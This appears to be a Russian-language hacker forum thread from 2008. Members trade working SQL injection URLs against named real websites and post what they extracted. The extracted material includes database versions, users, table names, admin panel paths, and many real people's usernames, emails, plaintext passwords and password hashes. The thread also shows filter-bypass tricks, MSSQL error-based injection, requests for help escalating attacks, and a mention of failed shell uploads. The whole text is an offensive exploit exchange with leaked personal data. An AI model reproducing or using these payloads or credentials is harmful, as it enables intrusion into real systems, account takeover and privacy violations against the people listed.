http://www.kaxi.com.br/area.php?id=6+and+1=2+union+select+table_name,2,3+ from+information_schema.tables+limit+20,1/*

Поскольку с бразильским у меня проблемы, а точнее я его совсем не знаю, найти интересную таблицу не удалось, единственное знакомое слово - email :)). Хотя наличие "мускула" имеет место.

frigid20

25.01.2008, 15:24

_http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_passwo rd,5,6,7+from+user/*

_http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,concat(email,0x3a,passwor d),7,8+from+users/*

Tigger

25.01.2008, 16:10

www.game-sector.ru
http://www.game-sector.ru/game.php?id=973+union+select+1,concat_ws(0x2f,vers ion(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20/*
4.1.22/d8242sa9814@z130.zone.ee/d8242sd5804
-----------------------------------------------------------------------
www.isimulacrum.com
http://www.isimulacrum.com/game.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Есть интересные таблы:
Log
Contributors
-----------------------------------------------------------------------
http://www1.redikod.com/www.nordicgameportal.com/game.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pw d),6,7,8,9,10,11,12,13,14,15,16+from+users/*
Есть доступ к mysql.user
-----------------------------------------------------------------------
http://www.isteoyun.com/game.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11/*
5.0.27/root@localhost/isteoyun

.Begemot.

25.01.2008, 18:20

boxing78.ru
http://www.boxing78.ru/?c=-7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE()),2,3,4,5,6,7/*
USER:ProBoxSQL@77.234.201.114
VERSION:4.1.20
DATABASE:ProBoxSQL
mtlaurelbaseball.org
http://www.mtlaurelbaseball.org/team.php?id=1+union+select+concat(USER(),0x3a,VERS ION(),0x3a,DATABASE()),1/*
USER:mtlaurel_1@localhost
VERSION:4.1.22-standard
DATABASE:mtlaurel_1

nex0

25.01.2008, 19:10

kraspol.ru
http://kraspol.ru/news.php?nid=59000+union+select+1,2,3,4,5,6,7,8/*
http://vesti-ural.ru/news.php?nid=1064999+union+select+1,2,3,4,concat(i d,char(58),name,char(58),email),6,7,8,9,10,11,12,1 3+from+users+limit+5,60/*
version() 4.1.22
user() kraspol@localhost
database() wwwkraspolru
vesti-ural.ru
version() 5.0.33-log
user() siteuser@localhost
database() vesti_ural

путь до скрипта /usr/Internet/WebSRV/news.php, узнал из ошибки мускула.

таблицы
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
apps
comments
fotoimage
fotorep
images
keywords
left_nav_banners
left_nav_panel
menuitems
mitemsect
news
newscomm
newsimag
newskeys
newsrubr
prg_items
prg_weeks
rubrics
sections
showapps
terms
users - колонки id, name, email, пассов не нашел=/
vipusks
w_city
w_day
w_descr
w_ekaburg
w_nebulosity
w_precipitation
w_weather
w_winddir
содержимое users
вид ID:name:email
1:Денис:MrDekk@sgtrk.ru
2:MrDekk:MrDekk@yandex.ru
3:Имя:E-mail
5:Огнева Татьяна:ota@ekt.usi.ru
6:Достовалова Елена Дмитриевна:femida@uralmail.com
7:заинтересовавшийся:vova26_92@p lanet-a.ru
8:Сергей Трофимов:strofimov@mail.ru
9:галина:torgova@ru66.ru
10:Света:Svetaxvostik@list.ru
11:Ромбик:Jane-tdk@mail.ru
12:наташа:forest13@ mail.ru
13:Имя Jul:E-mail orlova@di-fence.ru
14:Имя Владимир Александрович:E-mail shva@energops.ru
15:Kotovsk:kotovska@e1.ru
16:Ирина Сингх:irinasingh@mail.ru
17:Сергей:Over4@mail.ru
18:Анна:salymskaya@zhizn.e-burg.ru
19:Андрей:brabus45@yandex.ru
20:Алексей:Аleks@.ru
21:Prorok:Drug1drug@rambler.ru
22:Дина:kralka@yandex.ru
23:Имя МаксУля:E-mail podrabinok@bk.ru
24:bdfybwrfz:iot-smi@epn.ru
25:Татьяна:paravinat@mail.ru
26:константин:mushtandroid87mail.ru
27:Dawn:jack@fromru.net
28:Timothy:laura@mail15.com
29:Jody:mike@yahoo.com
30:Александр:sashka3333@rambler.ru
31:Дмитрий:bdv54@olympus.ru
32:Антон:apsplus@mail.ru
33:Марина:Katusha.But@rambler.ru
34:Николай Сызганов:nas@tsgrp.ru
35:Елена:fb69@mail.ru
36:Имя Екатерина:E-mail katrin-l@planet-a.ru
37:Ольга:ned.olga@mail.ru

админка
http://vesti-ural.ru/admin
лезть туда не пытался

tnuva.ru
http://www.tnuva.ru/recipes.php?rid=69699+union+select+1,2,3,4,5,6/*
B]version()[/B] 5.0.45-community-log
user() optionsw_ru01@localhost
database() optionsw_ru01

колонки в users
online
votes
addr
created
city
email
phone
thumb
filename
lastname
firstname
uid

stjag.ru
"+" фильтруется, поэтому я использую "/**/"
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,666,7,8,9,10,11,12,13,14/*
смотрим результат в <title></title>
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,concat(version(),char(58),user(),char(58 ),database()),7,8,9,10,11,12,13,14/*
version() 4.1.22 :mad:
user() dbu_ansimov_1@localhost
database() db_ansimov_6

Sharingan

25.01.2008, 19:26

http://ukrfoto.dp.ua/download.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a %20%20,database()),3,4,5,6/*
4.1.22-log:ukrfoto@saturn:ukrfoto

db_reader

25.01.2008, 19:27

www.cri-service.nl

http://www.cri-service.nl/Cv.php?id=-5+union+select+1,convert(concat_ws(0x3A3a,version( ),database(),user())+using+latin1),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35/*

4.1.11-standard::cri_cvcri::cri_cri@localhost

Таблицы не искал, может кому будет интересно. :)

WuWu

25.01.2008, 19:28

http://boardpros.net/index.php?menu=forum_catview&catid=9999+union+select+1,2,3,4,5,concat_ws(0x3a,u sername,upass,uemail),7+from+users/*
lepunk:fuckyou:meraj51@gmail.com
poster:runescape:mickyman_1@hotmail.com
owner:owner:gohkaiwei@gmail.com
nyunyu:74225:admin@hotfreesms.net
default:degauss:default_logon@yahoo.com
davino:4730410672:kritano@gmail.com
surfville:surfy231:surfville@gmail.com
kittie:20052005:yaseminkaradut@hotmail.com
bandaloon:sponge:darthwrathchild@seattle-mariners.net
darth wrathchild:sponge:bandaloon@mailinator.com
WarChiLd3192:123456:w4r_ch1ld@hotmail.com
Janizu99:jjl99:janizu99@hotmail.com

http://vostokmedia.com/news.details.php?id=99999+union+select+1,2,3,conca t_ws(0x3a,version(),user(),database()),5,6,7,8,9,1 0,11,12,13,14,15/*

4.1.22-standard-log
vostokmedia@localhost
vostokmedia

http://www.domkino.spb.ru/description.php?id=9999+union+select+1,2,3,4,5,6,7 ,8,9,concat_ws(0x3a,login,password,email,name),11, 12+from+user/*

shurik:ahin:sshurik@online.ru:Шурик

4.1.21-log
domkinospbru@78.108.81.211
domkinospbru

5taY3r

25.01.2008, 21:42

www.pcper.com
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6/*5.0.22:root@localhost:PCPerspective
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,userid,us ername,password),6+from+users/*
userid: username: password
1:Joe White:0ce6f50fd05a98110c2e1627fd98f164:solaris897
3:Ryan:2f86b8b4254dfba8e6e7cd9fdd7a9d46:QHDn47
6:Jon:46d55792707ba7c7883a0afa30127e06:kokoro12
9:Jeremy:124189dac0291419d7d2c875da0e7199
10:unclebob:dea926d0e46968b53dd6d542dc7a129b:butth aid
админка
http://www.pcper.com/admin/index.php

www.gurufocus.com
http://www.gurufocus.com/fairvalue.php?user_id=-27097+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4/*4.1.22-standard:gurufocu_add@localhost:gurufocu_forum

ElteRUS

25.01.2008, 23:41

http://f-forpost.ru/product.asp?id=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://f-forpost.ru/product.asp?id=-1+or+1=(select+db_name())--

forpost

http://f-forpost.ru/product.asp?id=-1+or+1=(select+system_user)--

sa
----------------------------------------------------------------------------

http://www.coldplace.ru/textmus.php?cd=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user())/*&song=2&name=&id2=1

4.1.20-lk-log/coldplac/coldplac@localhost
--------------------------------------------------------------------------

aprelevka.ru

http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,cast(ver sion()+as+binary),cast(database()+as+binary),cast( user()+as+binary)),8,9,10/*

4.1.11/aprelevka/root@localhost

http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,pa ssword,email),8,9,10+from+users+limit+0,1/*

логин/хеш/мейл
admin/4f2abf1ca5cfd9d21209d6ee83181f16/shurduk@yandex.ru

WuWu

26.01.2008, 03:10

http://www.bsigroup.ru/outgoing/context.php?id=22&this=9999'+union+select+1,concat_ws(0x3a,version() ,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17/*

5.0.22
bsigroup_newwww@localhost
bsigroup_out

таблица _system_user
и логины и пароли хешированы
вот что достал:
login / pass
root / 89905f508ebdc32e7eb0c24fdb118305
c13fdb1b736210f38d0d080fc102d822 / gctdlj
sergey/ 47e35e5e6ab2f91c765b7865399bf8e2
ba839967c5682a7cbe8f865ace327059 / afc60964559e943a8ba803c18f5de457
3e7a517843ed19a2b058bd7ce723fb49 / 862d10398b0bb1653fe239ca4f9a819a

5taY3r

26.01.2008, 20:04

www.maxygen.com
http://www.maxygen.com/newsview.php?listid=-293+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat_ws(0x3a,version(),user(),databa se()),20,21,22,23/*4.1.20:maxadmin_r@72.32.100.240:maxadmin_sqlstar

www.bi-me.com
http://www.bi-me.com/main.php?id=-16202+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),user(),database()),7,8,9/*&t=1&c=33&cg=44.1.22-standard:bime_sgadmin@localhost:bime_totalcontent

www.ilika.com
http://www.ilika.com/main.php?id=-7+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,version(),user(),database()),0x71),0x71)/*4.1.18-standard:ilikaadm_www@localhost:ilikaadm_www

www.swedishclub.com
http://www.swedishclub.com/main.php?id=-113+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,version(),user(),database()),0x71),0x71) ,4,5,6,7/*&menuid=524.1.18-nt:root@localhost:content

www.igp.pt
http://www.igp.pt/main.php?Id=-17+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9/*&Lingua=PT4.0.14-STANDARD:JAFONSO@OCTOPUS:WOF

159932

26.01.2008, 20:09

http://www.fiveavenue.ru/?pid=-1+union+select+1,2,3,4,login,6,pass,8,9,0+from+adm in/*
4.1.22-log
admin:admin
http://www.fiveavenue.ru/adm - не подходит .. ((
-----------------------------------------------------
oplati.ru
http://www.kapma.ru/index.php?cat=-89+union+select+1,2,3,concat_ws(0x3a,username,user _password),5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users+ limit+1,1/*
http://www.forum.oplati.ru/
Andy:a001e3532291b47293aebefee7616557:vfierr
-----------------------------------------------------
www.norfolkadmirals.com - PR5
http://www.norfolkadmirals.com/release_story1.php?id=-868+union+select+1,2,concat(table_name,0x3a,column _name),4,5,6,7+from+information_schema.columns+lim it+1111,1/*
колонок с пассами и нечем интересным не нащёл ((

5taY3r

26.01.2008, 20:31

2bobob
http://md5.xek.cc
5a4c36e900fb4d0a947751e0c59d8661:7827887

Dimi4

26.01.2008, 21:14

Tyc00n

26.01.2008, 21:18

To bobob
Лучше лимитом и сразу логин с пассом

http://www.faza.ru/alltop.php?cat=-1+union+select+concat(login,0x3a,password)+from+us ers+limit+1,1/*

bobob

26.01.2008, 21:20

да, мутный сайт, ну его нафиг!

Saint-Sky

26.01.2008, 21:22

Походу ник админа- faza
а id логина чет-не то. Ну например если id=20, то ник начинается на 20.
http://www.faza.ru/alltop.php?cat=-1+union+select+login+from+users+where+login=20/*
Но там не всё по порядку:
есть 1,2,3,4,7,10,11,20 далее не копал

Чё вы жопу рвёте такими запросами?
Вот вам faza:
http://www.faza.ru/alltop.php?cat=-1+union+select+concat_ws(0x3a,login,password)+from +users+limit+5,1/*
faza:5a4c36e900fb4d0a947751e0c59d8661

P.S. Почитайте про LIMIT

Dimi4

26.01.2008, 21:29

Гы, на том сайт, что не хеш, то - 7827887

A2GIL

26.01.2008, 23:10

Канадские ресурсы:

http://www.naturetrust.bc.ca/releases.php?id=5+and+1=2+union+select+1,concat(us er(),char(58),database(),char(58),version()),3,4/*

user: dbtnt126@205.178.132.70
database: tntsite
version:4.1.21

http://www.aamc.ca/about.php?id=8+and+1=2+union+select+1,table_name,3 ,4,5,6,7,8+from+information_schema.tables/*

version : 5.0.24a-standard-log 3
tabels( ..,tbl_bestrate 3, tbl_broker 3, tbl_faq 3, tbl_kerry 3, tbl_links 3, tbl_news 3, tbl_rate 3)

http://www.onmyblock.ca/media.php?id=5+and+1=2+union+select+1,2,concat(use r(),char(58),database(),char(58),version()),4/*

user: blockweb_block@localhost
database: blockweb_admin
version:4.1.22

5taY3r

26.01.2008, 23:42

www.70.pl
http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,0,1,2/*5.0.33-log:76@localhost:76
http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,sLogin,sPasswo rd,mail),5,6,7,8,9,10,11,12+from+70_tabUser/*На странице выводится порядка 2.676 записей данных польских юзеров вида
логин:пасс:мыло
admin:skurwysyn9:admin@70.pl
karol:kupka:kupka@gmail.com
karol1:droga2:droga2@o2.pl
mL7:1102860011399kzm:ml7@poczta.onet.pl
superopr:browar:ksiegarnia4u@ksiegarnia4u.pl
rkipias:dorota:rkipias@wp.pl
sambor.jj:290225a:Sambor.jj@wp.pl
fs:42LCEHga:Husar@boo.pl
slodki:7886:slodki@niezabijaj.com
drbadbrain:browar00:drbadbrain@tlen.pl
...и т.д.

Sharingan

27.01.2008, 22:00

Хороший буржуйский киношный сайт, пр6
http://www.comingsoon.net/news/movienews.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,d atabase())/*
смотрим титл 4.1.22:comingso_nextra@csnet-cm-internal:comingso_nextra

сайт про банки, пр6
http://www.reusablebags.com/facts.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7/*
pono@localhost:4.1.22-standard-log: pono_rub

И еще один буржуйский, пр5
http://www.exxonsecrets.org/html/personfactsheet.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,ve rsion(),0x3a,database()),9,10/*
greenpeace@localhost:5.0.27:greenpeace
верся >5 так что работает INFORMATION_SCHEMA.TABLES

everm1nd

27.01.2008, 23:14

вот веселенький едушный сайт. до админки не догрыз, зато получил пасики от министерских мыльниц. если кто-нить финиширует, то дайте мне знать.
http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-1+union+select+concat_ws(char(58),username,passwor d)+from+account+limit%200,1
вот через эту штуку можно получить реквизиты. наковырял примерно это:
admin2:4dooney!2
richauslander:richauslander:dbeck@exploratorium.ed u
erniekunze@earthlink.net:vivian (Ernie Kunze)
thomasc@exploratorium.edu:11111
fperson@physics.ucsc.edu:11111
уязвимы все скрипты поголовно. даже регистрация. блин. гдеж там одминка-то))

WuWu

28.01.2008, 01:02

http://www.losingtoday.com/tales.php?id=999+union+select+concat_ws(0x3a,versi on(),user(),database()),2,3,4,5,6/*

4.0.17-standard
admin_root@localhost
admin_losingt

fRg

28.01.2008, 14:08

galaxynet.comhttp://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4/* 4.1.20:galaxynet-website:root@localhosthttp://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 +from+mysql.user/*Логин : MySQL(pass) : root : 3a84bc4e4c3193e1 cpia.cahttp://www.cpia.ca/topics/default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16/* 4.0.27-debug-log:main_cpia_ca:cpiaca4736878645@web173.megawebse rvers.com

sczg.hr - Studentski Centar u Zagrebu - Sveučilište u Zagrebuhttp://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),database(),user())/* 5.0.32-Debian_7etch1-log:sczg:root@localhosthttp://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/limit/**/101,1/*Есть табы g2_User , login , db , host , user , но все они из mysql доступ к которой прикрыт :mad:

fRg

28.01.2008, 14:14

блин. гдеж там одминка-то
Что-то есть здесь _http://qt.exploratorium.edu/db/
Ещё и фтп присутствует : ftp.exploratorium.edu

fRg

28.01.2008, 15:13

Ещё немного...

NordlandTeater.nohttp://www.nordlandteater.no/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8/* 4.1.20:norteatret:norteatret@localhost

GriSoft.nl - AVG Antivirushttp://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8/* 4.1.20 - WideXS:uman:uman@212.204.254.10

Таба users с полями username и password :http://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8+from+users/*

Sharingan

28.01.2008, 16:22

Крупнейший новостной ресурс, в Мэйл топе 2 место =) незнаю что с него выжать можно даже
http://www.trud.ru/issue/article.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14/*
trudinfo@localhost:4.1.21-log:fox
подбирал названия, ничего, базы юзверей нет...
если кто что, сообщите ...

DJ ][akep

28.01.2008, 17:56

Уже третий или четвёртый раз о trud.ru пишите тему почитайте :)

P.S. А админка тут http://www.trud.ru/adm/admin.php

A2GIL

28.01.2008, 18:05

Аргентина.......-Россия пять ноль:)

http://www.riocuarto.gov.ar/area.php?are=33+and+1=2+union+all+select+1,2,3,con cat(user,char(58),password),5,6,7,8,9+from+mysql.u ser/*

root: (без пароля)
nllamosas:*510C4C5FEFE77EE518296F7FFDE8460AEF917B3 9
actualizador:32cab2e5244d5ee0
invitado:37ccf19067b01dd2
pestanguet:*C3905841DE2D2212AB395E17CE17D49A8074BA 99
ingreso:*272BC0F4D07864DBA45F1EB70A8DE7B66701B4BF
mysar: 68cc70f24a0b84af (mysar)
sistemas:65f74a972060f0a9

Жалко нет аргентинского словарика:)

http://www.3dgames.com.ar/hwreviews.php?Id=33+and+1=2+union+all+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,char(58 ),password,char(58)),17,18+from+mysql.user+limit+2 ,1/*

root: (без пароля)

http://www.loginstitute.ca/moreinfo.php?id=6+and+1=2+union+select+1,2,table_n ame,4,5,6,7+from+information_schema.tables+limit+2 2,1/*

таблицы следующие:

....
VIEWS
answers1
answers2
answers3
answers4
classroom_settings_tbl
classroom_user_tbl - что-то есть, но она без паролей!:(
finalanswers
finalexam
finalresults
quiz1
quiz2
quiz3
quiz4

http://www.tgao.ca/page.php?id=9+and+1=2+union+select+1,2,table_name, 4+from+information_schema.tables+limit+25,1/*

ElteRUS

28.01.2008, 18:06

http://gubakha.ru/ru/publications/publications/?publication=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user()),8/*

4.0.24_Debian-10sarge2-log/dbgubakha/gubakha@localhost

-----------------------------------------------------------------------------
literia.ru

http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

4.1.22-standard-log/literia_portal/literia_portal@local

http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,login,pwd,email),2+f rom+user+limit+0,1/*

логин/пароль/мейл
Mike/hubabuba/master@literia.ru

chekist

28.01.2008, 20:48

помогите советом, нашёл скуль заморочный

INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES (3,789,0,[sql],0x302e302e302e30)
fileid только intger
ipaddress ограничено по длине

можноли в этот запрос поставить insert или update, и как если возможно

fobofob

28.01.2008, 21:47

http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=@@versio n--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86 ) May 3 2005 23 :18 :38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790 : Service Pack 2)

http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=(select+ system_user)--

'sqlguest'

http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=(select+ db_name())--

'downloads'

больше ничего не получилось :(

159932

28.01.2008, 22:21

www.mosparohodstvo.ru
http://www.mosparohodstvo.ru/?pid=4&type=-3+union+select+1,2,3,4,concat(login,0x3a,password) ,6,7,8,9,0,1,2+from+fva_auth/*
5.0.45-log
admin:762d97b11b532702
http://www.mosparohodstvo.ru/adm/

.Begemot.

28.01.2008, 22:22

zmago.com
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE()),2,3,4,5,6,7,8,9/*
USER:slovino2@localhost
VERSION:5.0.45
DATABASE:slovino2
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,table_name,2,3,4,5,6,7,8,9+from+i nformation_schem a.tables/* - все названия таблиц
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,column_name,2,3,4,5,6,7,8,9+from+ information_sche ma.columns/* - все названия столбцов
fxmonitor.ru
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSI ON(),0x3a,DATABASE( )),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23/*&user=bf0ab9beec6bacd404743fcfc95dbcb6
USER:whcforex_admin@localhost
VERSION:5.0.45-community-log
DATABASE:whcforex_monitoring
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,table_name,6,7,8,9,10,11 ,12,13,14,15,16,17, 18,19,20,21,22,23+from+information_schema.tables/*&user=bf0ab9beec6bacd404743fcfc95dbcb6 - все названия таблиц
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,column_name,6,7,8,9,10,1 1,12,13,14,15,16,17 ,18,19,20,21,22,23+from+information_schema.columns/*&user=bf0ab9beec6bacd404743fcfc95dbcb6 - все названия столбцов
arbat-voyage.com
http://arbat-voyage.com/hotel.php?m=-188+union+select+0,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE())/*
USER:us1126b@localhost
VERSION:4.1.22
DATABASE:db1126b

min7

28.01.2008, 22:23

Уязвимы все сайты от LeaguePro Inc, введите в поисковик "This site created by LeaguePro Inc.".В любом из них будет такая скуль http://www.leaguepro.com/~whllorg/team.php?id=-62+union+select+concat_ws(char(58,58),user(),datab ase(),version()),2/*
правда выжить из неё что либо не удалось, т.к. 4.1.22-standard.

MaSter GeN

29.01.2008, 00:29

сайт довольно большого краснояркского интернет провайдера :)

http://www.kraslan.ru/other/banners.php?click=7+union+select+1,2,3,4,5,6,7,'te xt',9,10,11,12,13,14,15,16/*

DATABASE()=monitor :)
Username()=monitor@localhost
Version=5.0.41-log

Sharingan

29.01.2008, 02:08

сайт слабоалкогольного напитка, интересно нахрен столько полей там...
http://www.happyland.ru/brands.php?id=-1+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29/*
happyland:happyland@62.118.254.13:4.0.26-log

http://www.uprava.org/section.php?id=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7/*
4.0.27:uprava-org:uprava-org@he2.hoster.ru

Isis

29.01.2008, 04:28

http://www.iwdp.co.uk

Info:
http://www.iwdp.co.uk/profile.php?id=1+and+2=1+union+select+1,concat_ws( 0x3a,user(),version(),database()),3,4,5,6,7,8,9,10 ,11/*
iwdp@localhost:4.0.25-standard:iwdp

Disclosure path:
/home/iwdp/public_html/

Members area:
http://www.iwdp.co.uk/profile.php?id=1+and+2=1+union+select+1,2,3,4,5,6, 7,8,9,10,11+from+ibf_members+limit+0,1/*

Forum: (IPB 1.2.2)
http://www.iwdp.co.uk/profile.php?id=1+and+2=1+union+select+1,concat_ws( 0x3a,name,password),3,4,5,6,7,8,9,10,11+from+ibf_m embers+limit+1,1/*

[hash]
TiggerOnSpeed:a9f16cafdaffb824fb19ce24aa50dc04
[unhash]
TiggerOnSpeed:w173344e

Link to forum: http://www.iwdp.co.uk/members/admin.php

Все методы заливки шелла через админку в ипб не работают т.к. нет прав в дирах....

razzzar

29.01.2008, 04:45

http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9,10/*
pollan_article@localhost:4.1.22-standard:pollan_articles

min7

29.01.2008, 15:15

Несколько скуль, которые не получилось раскрутить:
http://www.tanzform.de/team.php?id=-14+union+select+concat_ws(char(58,58),user(),datab ase(),version()),2,3/*
tanzform@localhost::dbtanz::4.1.21
http://www.chaosfactors.com/wc3/team.php?id=-24+union+select+1,2,3,4,5,6,7,concat_ws(char(58,58 ),user(),version(),database()),9,10,11,12,13/*
chaosfactors@localhost::4.1.21-log::chaosfactors
http://www.weigandconstruction.com/about/team.php?id=-1+union+select+1,concat_ws(char(58,58),user(),data base(),version()),3,4,5,6,7,8,9,10,11,12,13/*
weigandc_wa@localhost::weigandc_weigand::4.0.27
http://www.thewoodgroupinc.com/team.php?ID=-11+union+select+1,concat_ws(char(58,58),user(),dat abase(),version()),3,4,5/*
TWG_FTPTWG@216.27.95.21::twg_database::4.1.22-max-log
http://www.steuerberater-prikryl.de/team.php?id=-32+union+select+1,2,concat_ws(char(58,58),user(),d atabase(),version()),4,5,6,7,8/*
prikryl@localhost:: pikryl::4.0.18
http://www.planervilla.de/team.php?id=-3+union+select+1,2,3,4,concat_ws(char(58,58),user( ),database(),version()),6/*
dbo162909144@212.227.119.46::db162909144::5.0.45-log Здесь ничё интересного...

Isis

29.01.2008, 16:40

http://sutherlands.com/homepage.php?store=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73/*

information_schema есть, но не видел полезных таблиц в бд..
Хотя мембер зона есть....

razzzar

29.01.2008, 17:03

http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,user(),version(),database()),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42/*

eutrsite@localhost:5.0.22-Debian_0ubuntu6.06.6-log:eutrainingsite

http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),ver sion(),database()),25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,82/*

vxweb@jazzy:4.1.20:allaboutjazz

andromeda

29.01.2008, 17:06

Вот собственно есть сайт :

http://diaries.wharton.upenn.edu/DiaristResults.asp?UserID=-1+or+1=(select+user)--

Команды исполняются, НО! добавил юзера, попробовал законектится, ввожу логин, пасс - не пускает! (не правильный пасс типа того). Может там домен надо указывать или еще чтонить? Помогите разобраться. Много сайтов встречал с такой байдой.

159932

29.01.2008, 17:33

http://www.michaelpollan.com/article.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,0/*
4.1.22-standard
-----------------------------------------------------
http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,5,6,7,8,9/*
4.1.22-log
-----------------------------------------------------
http://www.roskrup.ru/eq.php?razdel=9+union+select+1,2,3,4,5,6,7,8,9,0,1 ,2,3/*
вывода не нащёл ((
тиц 1.6к

}{0TT@БЬ)Ч

29.01.2008, 17:44

http://www.roskrup.ru/groats.html?goods=-17'+union+select+1,2,null,null,null,concat_ws(char (58),username,password,email),null,null,null,null, null,null,13+from+users/*
вот держи тебе и вывод и юзера какие-то не проверял откуда они, всего их 1624

ReVOLVeR

29.01.2008, 18:17

MsSQL
ttp://www.gettech.org/category2.asp?cat='
ttp://www.readersclub.org/category.asp?cat='
ttp://www.zap.co.il/cat.asp?cat='
